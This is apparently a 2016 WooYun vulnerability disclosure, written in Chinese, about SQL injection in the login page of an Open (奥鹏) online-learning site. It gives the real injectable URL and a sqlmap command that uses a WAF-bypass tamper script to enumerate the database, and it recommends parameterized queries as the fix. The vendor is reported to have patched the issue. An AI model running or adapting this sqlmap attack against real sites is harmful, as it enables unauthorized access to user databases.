奥鹏某站加固不当仍可绕过

编号178188
Urlhttp://www.wooyun.org/bug.php?action=view&id=178188
漏洞状态厂商已经修复
漏洞标题奥鹏某站加固不当仍可绕过
漏洞类型SQL注射漏洞
厂商open.com.cn
白帽子路人甲
提交日期2016-02-24 09:52:00
公开日期2016-03-04 08:23:00
修复时间2016-03-04 08:23:00
确认时间2016-02-24 00:00:00
Confirm Spend0
漏洞标签注射技巧
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank18
漏洞简介
网络学习平台加固不当,脚本绕过
漏洞细节

登录处
username 注入
默认是不出数据的,使用space2mssqlblank.py脚本,可以绕过限制,dump数据
注入点:
http://os.open.com.cn:80/WebApi_Public/Account/User/Login?username=admin&password=1111&%E6%8F%90%E4%BA%A4=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
使用tamper
sqlmap.py -u "http://os.open.com.cn:80/WebApi_Public/Account/User/Login?username=admin&password=1111&%E6%8F%90%E4%BA%A4=%E6%8F%90%E4%BA%A4%E6%9F
%A5%E8%AF%A2" --batch --tamper space2mssqlblank.py --current-db

2.png


应该是有119张表的

1.png


POC

1.png


修复方案

参数化查询最有效
看总体的加固结果都不是很有效,还是弄个WAF

状态信息 2016-02-24: 细节已通知厂商并且等待厂商处理中
2016-02-24: 厂商已经确认,细节仅向厂商公开
2016-03-04: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复已提交相关人员处理。-liu
回应信息危害等级:高漏洞Rank:18 确认时间:2016-02-24 19:51